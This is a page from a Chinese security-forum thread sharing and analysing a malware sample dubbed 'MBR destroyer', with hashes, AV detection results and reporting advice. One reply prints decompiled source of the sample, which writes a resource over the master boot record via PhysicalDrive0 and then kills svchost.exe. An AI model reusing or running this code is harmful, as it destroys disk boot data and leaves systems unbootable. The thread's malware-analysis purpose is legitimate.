收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 MBR摧毁者 1x
12
返回列表 发新帖
楼主: 压缩的时空
 收起左侧

[病毒样本] MBR摧毁者 1x

[复制链接]
LingGao
发表于 5 小时前 | 显示全部楼层
下载好啦~

“sdk_demo2.exe”
MD5 - 79aedf35d155a52fea1454bfa0a2b158
SHA256 - 7054a0a5f7c56594d4d6d9e1d3c481553870d8253526bc36fda2a830c088f18a

infected

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

压缩的时空
 楼主| 发表于 5 小时前 | 显示全部楼层
LingGao 发表于 2026-2-28 14:02
下载好啦~

“sdk_demo2.exe”

赞赞赞
回复

举报

wowocock
发表于 5 小时前 | 显示全部楼层
int __fastcall main(int argc, const char **argv, const char **envp)
{
  HRSRC ResourceW; // rax
  HRSRC v4; // rbx
  HGLOBAL Resource; // rsi
  DWORD v6; // edi
  const void *v7; // rbx
  HANDLE FileW; // rax
  void *v9; // rsi
  BOOL v10; // ebx
  DWORD NumberOfBytesWritten; // [rsp+40h] [rbp-18h] BYREF

  ResourceW = FindResourceW(0i64, (LPCWSTR)0x65, (LPCWSTR)0xA);
  v4 = ResourceW;
  if ( !ResourceW )
    return 1;
  Resource = LoadResource(0i64, ResourceW);
  if ( !Resource )
    return 1;
  v6 = SizeofResource(0i64, v4);
  v7 = LockResource(Resource);
  if ( !v7 )
    return 1;
  if ( v6 - 1 > 0x1FF )
    return 1;
  FileW = CreateFileW(L"\\\\.\\PhysicalDrive0", 0x40000000u, 3u, 0i64, 3u, 0, 0i64);
  v9 = FileW;
  if ( FileW == (HANDLE)-1i64 )
    return 1;
  NumberOfBytesWritten = 0;
  v10 = WriteFile(FileW, v7, v6, &NumberOfBytesWritten, 0i64);
  CloseHandle(v9);
  if ( !v10 || NumberOfBytesWritten != v6 )
    return 1;
  system("taskkill /im svchost.exe /f");
  return 0;
}
你这装的毫无意义啊,好歹有点新意啊?
回复

举报

压缩的时空
 楼主| 发表于 5 小时前 | 显示全部楼层
wowocock 发表于 2026-2-28 14:14
int __fastcall main(int argc, const char **argv, const char **envp)
{
  HRSRC ResourceW; // rax

看一下11楼
回复

举报

wowocock
发表于 4 小时前 | 显示全部楼层
压缩的时空 发表于 2026-2-28 14:17
看一下11楼

他自己实现的免杀壳?
回复

举报

压缩的时空
 楼主| 发表于 4 小时前 | 显示全部楼层
本帖最后由 压缩的时空 于 2026-2-28 14:37 编辑
wowocock 发表于 2026-2-28 14:30
他自己实现的免杀壳?

https://www.bilibili.com/video/BV1bhAXzXEJn/

视频里有,说是 银狐+混血免杀+变种 /shellcode 木马
有劳分析了
回复

举报

wowocock
发表于 4 小时前 | 显示全部楼层
压缩的时空 发表于 2026-2-28 14:34
https://www.bilibili.com/video/BV1bhAXzXEJn/

视频里有,说是 银狐+混血免杀+变种 /shellcode 木马
...

你到火绒论坛上发帖子,让他们转病毒分析组看看,到时候会给你BUG ID,你可以根据ID,找客服查询进度。
回复

举报

压缩的时空
 楼主| 发表于 4 小时前 | 显示全部楼层
本帖最后由 压缩的时空 于 2026-2-28 14:53 编辑
wowocock 发表于 2026-2-28 14:42
你到火绒论坛上发帖子,让他们转病毒分析组看看,到时候会给你BUG ID,你可以根据ID,找客服查询进度。

ok,最多拉黑入库吧,提bug...估摸着还没到那个层级,还有这个程序还要输入卡密的是啥情况.
回复

举报

WGC_ZY
发表于 3 小时前 | 显示全部楼层
ESSP:
2/28/2026 1:58:18 PM;Real-time file system protection;file;C:\Users\Zhang\Downloads\MBRKiller.exe;a variant of Win64/KillMBR.BA trojan;cleaned by deleting
回复

举报

浦北光
发表于 1 小时前 | 显示全部楼层
KES扫描miss
回复

举报

12
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-2-28 19:19 , Processed in 0.075848 second(s), 4 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表